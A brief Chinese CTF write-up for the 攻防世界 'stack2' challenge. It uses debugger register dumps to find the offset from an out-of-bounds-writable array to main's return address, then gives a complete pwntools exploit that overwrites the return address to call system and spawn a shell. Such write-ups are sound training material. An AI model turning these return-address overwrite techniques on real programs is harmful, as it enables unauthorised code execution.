填坑=-= 记下数组偏移寻找嗷
攻防世界stack2
如下有数组越界
1
2
3
4
5
| puts("which number to change:");
__isoc99_scanf("%d", &v5);
puts("new number:");
__isoc99_scanf("%d", &v7);
v13[v5] = v7;
|
如上图1部分方框完成数组赋值,cl寄存器计数,明显eax存放首地址
我们要跳转函数就要找数组首地址距离ret的返回
so第一个断点在mov [eax],cl
第二个在main的ret
结果
如下eax就是数组首地址
1
2
3
4
5
6
7
8
9
10
| EAX 0xffffcf88 ◂— 0xe0
EBX 0x0
ECX 0xff
EDX 0xffffcf88 ◂— 0xe0
EDI 0xf7fb8000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x1b2db0
ESI 0xf7fb8000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x1b2db0
EBP 0xffffcff8 ◂— 0x0
ESP 0xffffcf50 —▸ 0xf7ffda74 —▸ 0xf7fd3470 —▸ 0xf7ffd918 ◂— 0x0
EIP 0x80486d5 (main+261) ◂— mov byte ptr [eax], cl
|
如下esp是栈指针的存放寄存器此时指向ret
1
2
3
4
5
6
7
8
9
10
| *EAX 0x0
EBX 0x0
*ECX 0xffffd010 ◂— 0x1
*EDX 0xf7fb987c (_IO_stdfile_0_lock) ◂— 0x0
EDI 0xf7fb8000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x1b2db0
ESI 0xf7fb8000 (_GLOBAL_OFFSET_TABLE_) ◂— 0x1b2db0
*EBP 0x0
*ESP 0xffffd00c —▸ 0xf7e1d647 (__libc_start_main+247) ◂— add esp, 0x10
*EIP 0x80488f2 (main+802) ◂— ret
|
ret的地址减去eax存放的地址
hex(0xffffd00c-0xffffcf88)
=0x84
因为服务器环境错误后面没有so我们就用system+/bin/sh
exp
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
| from pwn import *
r = process("./stack2")
r.recvuntil("How many numbers you have:\n")
r.sendline("1")
r.recvuntil("Give me your numbers\n")
r.sendline("1")
def change(addr, num):
r.recvuntil("5. exit\n")
r.sendline("3")
r.recvuntil("which number to change:\n")
r.sendline(str(addr))
r.recvuntil("new number:\n")
r.sendline(str(num))
change(0x84, 0x50)
change(0x85, 0x84)
change(0x86, 0x04)
change(0x87, 0x08)
change(0x8c, 0x87)
change(0x8d, 0x89)
change(0x8e, 0x04)
change(0x8f, 0x08)
r.sendline("5")
r.interactive()
|